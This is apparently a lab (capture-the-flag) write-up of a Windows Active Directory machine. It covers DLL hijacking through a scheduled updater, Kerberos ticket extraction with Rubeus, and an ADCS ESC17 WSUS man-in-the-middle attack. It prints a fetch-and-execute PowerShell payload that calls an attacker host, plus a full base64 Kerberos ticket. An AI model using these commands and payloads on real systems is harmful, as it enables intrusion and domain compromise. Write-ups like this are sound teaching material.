                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc` for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\msa_health$\Documents> 

Injecting DLLs into Jaylee.Clifton

Looking at our Documents folder we find a script called monitor.ps1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
*Evil-WinRM* PS C:\Users\msa_health$\Documents> type monitor.ps1
<#
.SYNOPSIS
    Monitors the status of the "UpdateChecker Agent" scheduled task.
    Uses COM interface to avoid CIM/WMI permission issues.
#>

$TaskName = "UpdateChecker Agent"
$LogPath = "C:\Share\Logs\TaskMonitor.log"
$Timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"

try {
    $service = New-Object -ComObject "Schedule.Service"
    $service.Connect()
    $task = $service.GetFolder("\").GetTask($TaskName)

    $State = switch ($task.State) {
        1 { "Disabled" }
        2 { "Queued" }
        3 { "Ready" }
        4 { "Running" }
        5 { "Disabled" }
        6 { "Unknown" }
        default { "Unknown" }
    }

    if ($State -ne "Ready" -and $State -ne "Running") {
        $Message = "[$Timestamp] WARN  - Task [$TaskName] is in an unexpected state: $State"
    }
    else {
        $Message = "[$Timestamp] INFO  - Task [$TaskName] health check: OK (State: $State)"
    }
}
catch {
    $Message = "[$Timestamp] ERROR - Failed to query task [$TaskName]. Exception: $($_.Exception.Message)"
}

Add-Content -Path $LogPath -Value $Message

Since I keep running into CMI permission errors when looking for Scheduled Tasks I’ll be using the recommended COM method instead. Let’s just copy paste a couple of the commands from the script so we can view the exact task

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $TaskName = "UpdateChecker Agent"
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $service = New-Object -ComObject "Schedule.Service"
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $service.Connect()
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $task = $service.GetFolder("\").GetTask($TaskName)
*Evil-WinRM* PS C:\Users\msa_health$\Documents> $task


Name               : UpdateChecker Agent
Path               : \UpdateChecker Agent
State              : 3
Enabled            : True
LastRunTime        : 4/20/2026 6:02:15 AM
LastTaskResult     : 0
NumberOfMissedRuns : 0
NextRunTime        : 4/20/2026 6:05:15 AM
Definition         : System.__ComObject
Xml                : <?xml version="1.0" encoding="UTF-16"?>
                     <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                       <RegistrationInfo>
                         <Date>2026-04-16T16:39:34.3280175</Date>
                         <Author>logging\Administrator</Author>
                         <URI>\UpdateChecker Agent</URI>
                       </RegistrationInfo>
                       <Principals>
                         <Principal id="Author">
                           <UserId>S-1-5-21-4020823815-2796529489-1682170552-2105</UserId>
                           <LogonType>Password</LogonType>
                         </Principal>
                       </Principals>
                       <Settings>
                         <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
                         <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                         <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
                         <IdleSettings>
                           <StopOnIdleEnd>true</StopOnIdleEnd>
                           <RestartOnIdle>false</RestartOnIdle>
                         </IdleSettings>
                       </Settings>
                       <Triggers>
                         <TimeTrigger>
                           <StartBoundary>2026-04-16T16:38:15</StartBoundary>
                           <Repetition>
                             <Interval>PT3M</Interval>
                           </Repetition>
                         </TimeTrigger>
                       </Triggers>
                       <Actions Context="Author">
                         <Exec>
                           <Command>"C:\Program Files\UpdateMonitor\UpdateMonitor.exe"</Command>
                           <Arguments>500 /scan=3 /autofix=true</Arguments>
                         </Exec>
                       </Actions>
                     </Task>

We find a task called UpdateMonitor which is run every 3 minutes. Let’s take a look at the directory of the executable and see what we can find.

1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\w1ld> ls 'C:\Program Files\UpdateMonitor'


    Directory: C:\Program Files\UpdateMonitor


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/16/2026   4:10 PM                bin
d-----        4/16/2026   4:10 PM                packages
-a----        2/21/2026   3:52 PM            189 App.config
-a----        2/21/2026   3:52 PM            157 packages.config
-a----         4/9/2026  10:31 PM           8192 UpdateMonitor.exe

I’ll transfer the executable over and disassemble it using ilspycmd

1
$ ilspycmd UpdateMonitor.exe > UpdateMonitor.cs

Let’s have a look at the code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
using System;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Linq;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Runtime.Versioning;

[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
[assembly: AssemblyTitle("UpdateMonitor")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("UpdateMonitor")]
[assembly: AssemblyCopyright("Copyright ©  2026")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: Guid("e08d70ab-2045-41b2-9012-8323eebb8c47")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: TargetFramework(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
[assembly: AssemblyVersion("1.0.0.0")]
namespace UpdateMonitor;

internal class Program
{
        private delegate void PreUpdateCheck();

        [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);

        [DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
        private static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);

        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern bool FreeLibrary(IntPtr hModule);

        private static void Main(string[] args)
        {
                string path = "C:\\ProgramData\\UpdateMonitor\\Logs\\monitor.log";
                string text = "C:\\ProgramData\\UpdateMonitor\\Settings_Update.zip";
                string text2 = "C:\\Program Files\\UpdateMonitor\\bin\\";
                string text3 = "settings_update.dll";
                string text4 = Path.Combine(text2, text3);
                Directory.CreateDirectory(Path.GetDirectoryName(path));
                CleanupLogs(path, 90);
                Log(path, "Starting Sentinel Update Check...");
                Log(path, "Checking for update on core server...");
                Log(path, "Info: Core did not find file Settings_Update.zip");
                Log(path, "Last status: File not found on core");
                Log(path, "Checking for update on local server...");
                if (File.Exists(text))
                {
                        try
                        {
                                if (File.Exists(text4))
                                {
                                        File.Delete(text4);
                                }
                                ZipFile.ExtractToDirectory(text, text2);
                                Log(path, "Successfully unzipped update to " + text2);
                        }
                        catch (IOException ex)
                        {
                                Log(path, "Update failed: " + ex.Message);
                        }
                        catch (Exception ex2)
                        {
                                Log(path, "Update failed: " + ex2.Message);
                        }
                }
                else
                {
                        Log(path, "No updates found locally: C:\\ProgramData\\UpdateMonitor\\Settings_Update.zip.");
                }
                Log(path, "Loading update applier: " + text4);
                IntPtr intPtr = LoadLibrary(text4);
                if (intPtr == IntPtr.Zero)
                {
                        int lastWin32Error = Marshal.GetLastWin32Error();
                        Log(path, $"Failed to load {text3}. Error code: {lastWin32Error}");
                        Log(path, "Update check completed.");
                        return;
                }
                try
                {
                        IntPtr procAddress = GetProcAddress(intPtr, "PreUpdateCheck");
                        if (procAddress != IntPtr.Zero)
                        {
                                Log(path, "Calling 'PreUpdateCheck' in " + text3);
                                ((PreUpdateCheck)Marshal.GetDelegateForFunctionPointer(procAddress, typeof(PreUpdateCheck)))();
                        }
                        else
                        {
                                Log(path, "'PreUpdateCheck' not found in " + text3 + ". Continuing...");
                        }
                }
                finally
                {
                        FreeLibrary(intPtr);
                }
                Log(path, "Update check completed.");
        }

        private static void CleanupLogs(string path, int maxLines)
        {
                try
                {
                        FileInfo fileInfo = new FileInfo(path);
                        if (fileInfo.Exists && fileInfo.Length >= 102400)
                        {
                                string[] array = File.ReadAllLines(path);
                                if (array.Length > maxLines)
                                {
                                        string[] contents = array.Take(maxLines).ToArray();
                                        File.WriteAllLines(path, contents);
                                }
                        }
                }
                catch
                {
                }
        }

        private static void Log(string path, string message)
        {
                string text = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss}] {message}{Environment.NewLine}";
                Console.Write(text);
                try
                {
                        File.AppendAllText(path, text);
                }
                catch
                {
                }
        }
}
You are not using the latest version of the tool, please update.
Latest version is '10.0.0.8330' (yours is '8.2.0.7535-95108c96')

Having Claude analyze the code we get the following:

1
2
3
4
1. Checks for Settings_Update.zip in C:\ProgramData\UpdateMonitor\
2. If exists → extracts it to C:\Program Files\UpdateMonitor\bin\
3. Loads settings_update.dll via LoadLibrary()
4. Calls exported function "PreUpdateCheck" if it exists

We can check if we can write to either directory:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
PS C:\> icacls 'C:\ProgramData\UpdateMonitor'
C:\ProgramData\UpdateMonitor NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                             BUILTIN\Administrators:(I)(OI)(CI)(F)
                             CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                             BUILTIN\Users:(I)(OI)(CI)(RX)
                             BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files
PS C:\w1ld> icacls 'C:\Program Files\UpdateMonitor\bin'
C:\Program Files\UpdateMonitor\bin logging\IT:(I)(OI)(CI)(F)
                                   NT SERVICE\TrustedInstaller:(I)(F)
                                   NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                   NT AUTHORITY\SYSTEM:(I)(F)
                                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                   BUILTIN\Administrators:(I)(F)
                                   BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                   BUILTIN\Users:(I)(RX)
                                   BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                   CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Since we can write to C:\ProgramData\UpdateMonitor we’re able to zip up a dll and upload it to this folder until the task exectues.

I’ll be using my usual reverse shell dll file for this and zipping it up.

1
2
3
4
$ file settings_update.dll
settings_update.dll: PE32 executable for MS Windows 6.01 (DLL), Intel i386 (stripped to external PDB), UPX compressed, 3 sections
$ zip Settings_Update.zip settings_update.dll
updating: settings_update.dll (deflated 0%)

Let’s transfer the file over and check that it exists

PS C:\w1ld> ls C:\ProgramData\UpdateMonitor\


    Directory: C:\ProgramData\UpdateMonitor


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/16/2026   4:43 PM                Logs
-a----        4/19/2026   6:28 AM        3914778 Settings_Update.zip

Note that our dll has to match the UpdateMonitor.exe bitness, in this case: PE32 i386 otherwise it won’t execute, if you don’t know what to use, a simple msfvenom reverse_tcp should work just fine. If you’re making your own dll ensure that

Now we simply wait for UpdateMonitor to trigger, and we should get a reverse shell on our listener.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
logging\jaylee.clifton
PS C:\Windows\system32> dir ~/Desktop 


    Directory: C:\Users\jaylee.clifton\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/19/2026   6:21 AM             34 user.txt

There we can find the user flag.

Root

Remote Auth as Jaylee.Clifton

Just like before I’ll grab a TGT so we can authenticate, this time I’ll do it through Rubeus to grab my cached credential in the form of a base64 kirbi ticket.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
PS C:\w1ld> ./Rubeus.exe tgtdeleg /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/DC01.logging.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation request success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: l52eYnKNGgDA+7/Fp6HEFL7Ell6zJaAAj4ctl79jw5w=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      doIFyDCCBcSgAwIBBaEDAgEWooIEyjCCBMZhggTCMIIEvqADAgEFoQ0bC0xPR0dJTkcuSFRCoiAwHqADAgECoRcwFRsGa3JidGd0GwtMT0dHSU5HLkhUQqOCBIQwggSAoAMCARKhAwIBAqKCBHIEggRuonwjPFVDtKtnBwKdj5Pa+mV+UcnK4Vj
9yvOzuhTD0cMirL9TB2BOMLrqEnBbO9BFGJZ+mSAbT8zBCrfLzqR7youiu+j90dRPRJzxwv/8lsep0HphhVeF1rZ1gVFIXDreS+7Zwuur0HLDHGNsFGeCnGr0RQzh9YVEr1xn1Ltp30xuHsl+VVYKTHsNvd9+PRjkAFei18QzPGl4Kyq56ZPZjLnNz9Pl
87imJ1qjkHvcNs8lSQ0TROCBNn8xnGRDix4Vds6p2UH3eLLIfb6tCQpicLvuOB2gvsZTeU2q621OGnMG0HkxDTeIPBUDGyD3WgcJw1Fwr9Vj+kNdH62xF5czYJr7+E3ZBvpIaieg8hy58o7Hfi+hyOqWAZ53LuFEeGzMR7+ES83V+pzIVLwPzreA90M5d
ZwIelXIDo5juOyqQ24z14z2GK8a6a5mQJvO8/JMKuupg0FzJ3uez2hO4Kr5SE9aPdcqlk6qy2ufn8MdS5G63+IKb3mWQiuriqu9fn4Z9Rgtgf44zOgKTtmmJrDUGx0/4NlRQoxUZzHlTu3nR/wa8+vdT8voUsVCiTsGN69szS6Y+9FrWJ1VPQV3k2KnMk
5xsOXWy907KhruIYMbDDQA+sRN3bXIEZE8EOnyW3NHxiesO/c4oc0qdUjKfqMfMOw8XMbFp8I7p9Tmq+NWrsJpOnfSAuHDa0bPB6Or1qL5QRA3ifoRWmqvIr6J8uQMOYj24uCBMP/D0B6c0cEnvTQDHsmQYUmTJYH5OzGajxxgqJeY4W/b39JS3gDT4SO
lovQr2ipXlS4gbOpi0UGD/cBN5HOon1HHwHfAZ16CK9Yjre45iU0R793LiwKpmEEG9XFks2qocw1tlahxQSm8fuJRj4wSEUGywnFEyzwAcR29SV5cZXudBZrW6fJl/CLEYo85lHC6fKNJF6ljLvmk5YenuahVnBQVExVLtbI58qNKjTbHalNtEs9k7MPh
ftAN3cYnVbZFN+gqzyB+cRyxWSjc9mwheKa6opaxNkt44U26x3yy8QiKjYWHlgyWaRF14+QXF2oipUIJWUk6x0Y8aN6lc46h+KhtIRvf/TyqgYJ7lU7m9xoqaPsPNCkTbfC3mfu91FlbW7EUnl9NU7KXwAeazUYb2KJq10OIpFKy95LQnjmgziZ/GvVKT
WsoG62ygWwqM2sJiiEbKqDGZRlRajFhxTUnNJdPDUSZFK8x1G+s4DyHTwV21jGWZv16VXqfM79HdCYiwrrddJ0f+qicZs5DTI4HC1mXwHdGzfJDucNW4CeB0ISglxExgOgr16SUhXgQdpD87f/h2SPnF0+7C3KC3kV81pD1nEG2l7SnYa5/NdM+yuYqhK
f17KPJOQyQ0WcMBJPYiJbRvXNpM7S2Ke0jM8P6bdVYNSZbOI0/DBCZBx36VYrtAdnahTW7CGOLtkeN6TG/T6TAvT/pBAxKYOSY0Bh8nb5MY6U8XbDONwfuaPiuIG6itvt8jIJ26JPE4qahnEdrXZS+ZkKphvllo4HpMIHmoAMCAQCigd4Egdt9gdgwgdW
ggdIwgc8wgcygKzApoAMCARKhIgQgV5emnR3JLfs9eIcdPU8zZVse/2QG7J2FbXzDbowFEXWhDRsLTE9HR0lORy5IVEKiGzAZoAMCAQGhEjAQGw5qYXlsZWUuY2xpZnRvbqMHAwUAYKEAAKURGA8yMDI2MDQxOTE5MDQ0N1qmERgPMjAyNjA0MjAwNTAy
MTVapxEYDzIwMjYwNDI2MTkwMjE1WqgNGwtMT0dHSU5HLkhUQqkgMB6gAwIBAqEXMBUbBmtyYnRndBsLTE9HR0lORy5IVEI=

After which I’ll put this base64 kirbi into a file and convert it into a TGT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ ticketConverter.py j.clifton.kirbi -b j.clifton.ccache
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies 

[*] base64 decoding ticket
[*] converting kirbi to ccache...
[+] done
$ export KRB5CCNAME=j.clifton.ccache
$ klist      
Ticket cache: FILE:j.clifton.ccache
Default principal: jaylee.clifton@LOGGING.HTB

Valid starting       Expires              Service principal
04/19/2026 15:04:47  04/20/2026 01:02:15  krbtgt/LOGGING.HTB@LOGGING.HTB
        renew until 04/26/2026 15:02:15

ESC17 - WSUS MITM

Jaylee.Clifton is a member of the IT, and Performance Log Users group as we have seen before in our group enumeration.

distinguishedName: CN=Performance Log Users,CN=Builtin,DC=logging,DC=htb
member: CN=jaylee.clifton,CN=Users,DC=logging,DC=htb
distinguishedName: CN=IT,CN=Users,DC=logging,DC=htb
member: CN=jaylee.clifton,CN=Users,DC=logging,DC=htb

Taking a look at our Certificates for the IT group we can find has Enrollment Rights against UpdateSRV Certificate which is vulnerable to ESC17, you’ll need this pull request version of Certipy to find these.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
$ jq '.["Certificate Templates"][]' 20260419162152_Certipy.json
{
  "Template Name": "UpdateSrv",
  "Display Name": "UpdateSrv",
  "Certificate Authorities": [
    "logging-DC01-CA"
  ],
  "Enabled": true,
  "Client Authentication": false,
  "Enrollment Agent": false,
  "Any Purpose": false,
  "Enrollee Supplies Subject": true,
  "Certificate Name Flag": [
    1
  ],
  "Extended Key Usage": [
    "Server Authentication"
  ],
  "Requires Manager Approval": false,
  "Requires Key Archival": false,
  "Authorized Signatures Required": 0,
  "Schema Version": 2,
  "Validity Period": "10 years",
  "Renewal Period": "6 weeks",
  "Minimum RSA Key Length": 2048,
  "Template Created": "2026-04-17 00:41:06+00:00",
  "Template Last Modified": "2026-04-17 00:41:07+00:00",
  "Permissions": {
    "Enrollment Permissions": {
      "Enrollment Rights": [
        "LOGGING.HTB\\IT",
        "LOGGING.HTB\\Domain Admins",
        "LOGGING.HTB\\Enterprise Admins"
      ]
    },
    "Object Control Permissions": {
      "Owner": "LOGGING.HTB\\Administrator",
      "Full Control Principals": [
        "LOGGING.HTB\\Domain Admins",
        "LOGGING.HTB\\Enterprise Admins"
      ],
      "Write Owner Principals": [
        "LOGGING.HTB\\Domain Admins",
        "LOGGING.HTB\\Enterprise Admins"
      ],
      "Write Dacl Principals": [
        "LOGGING.HTB\\Domain Admins",
        "LOGGING.HTB\\Enterprise Admins"
      ],
      "Write Property Enroll": [
        "LOGGING.HTB\\Domain Admins",
        "LOGGING.HTB\\Enterprise Admins"
      ]
    }
  },
  "[+] User Enrollable Principals": [
    "LOGGING.HTB\\IT"
  ],
  "[!] Vulnerabilities": {
    "ESC17": "Enrollee supplies subject and template allows server authentication."
  },
  "[*] Remarks": {
    "ESC17": "Other prerequisites may be required for this to be exploitable. See the wiki for more details."
  }
}

We notice a couple things, first of all LOGGING.HTB\\IT has Enrollment Permissions and is also an Enrollable Principal, secondly we have Enrollee Supplies Subject: true which indicates that this should be vulnerable to ESC17, which is ESC1 through WSUS so let’s write a DNS record

1
2
$ bloodyAD -H dc01.logging.htb -k -d logging.htb add dnsRecord "wsus" "10.10.15.60"
[+] wsus has been successfully added

Next let’s request a certificate with the DNS SAN specified with the vulnerable template.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ certipy req -k -no-pass -target DC01.logging.htb -ca logging-DC01-CA -dns wsus.logging.htb -template UpdateSrv -out w1ldsus.pfx
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[!] DNS resolution failed: The DNS query name does not exist: DC01.logging.htb.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: LOGGING.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 8
[*] Successfully requested certificate
[*] Got certificate with DNS Host Name 'wsus.logging.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'w1ldsus.pfx'
[*] Wrote certificate and private key to 'w1ldsus.pfx'

Next we can use wsuks to automate the rest of the exploitation. We’ll need to first convert our pfx to a pem file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Conversion to Pem
$ openssl pkcs12 -in w1ldsus.pfx -out w1ld.pem -nodes -passin pass:
# Serve the payload
$ sudo wsuks --serve-only --tls-cert w1ld.pem --WSUS-Port 8531 -k --dc-ip 10.129.29.8 --dc-name DC01.logging.htb -c '/accepteula /s powershell.exe "iex(iwr http://10.10.15.60:3232/ra.exe.ps1 -useb)"' -I tun0

    __          __ _____  _    _  _  __  _____
    \ \        / // ____|| |  | || |/ / / ____|
     \ \  /\  / /| (___  | |  | || ' / | (___
      \ \/  \/ /  \___ \ | |  | ||  <   \___ \
       \  /\  /   ____) || |__| || . \  ____) |
        \/  \/   |_____/  \____/ |_|\_\|_____/

     Pentesting Tool for the WSUS MITM Attack
               Made by NeffIsBack
                 version: 1.2.1

[+] Command to execute: 
PsExec64.exe powershell.exe "iex(iwr http://10.10.15.60:3232/ra.exe.ps1 -useb)"
[*] ===== Starting Web Server =====
[*] Using TLS certificate 'w1ld.pem' for HTTPS WSUS Server
[*] Starting WSUS Server on 10.10.15.60:8531...
[*] Serving executable as KB: 8916793

After a while I get a callback on my listener.

1
2
3
4
5
6
7
8
9
10
11
12
13
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> ls C:\Users\toby.brynleigh\Desktop\ 


    Directory: C:\Users\toby.brynleigh\Desktop


Mode                LastWriteTime         Length Name                                                                                                                                                                                       
----                -------------         ------ ----                                                                                                                                                                                       
-ar---        4/19/2026   6:21 AM             34 root.txt                                                                                                                                                                                   

There we can find the root flag.

tags: os/windows - diff/medium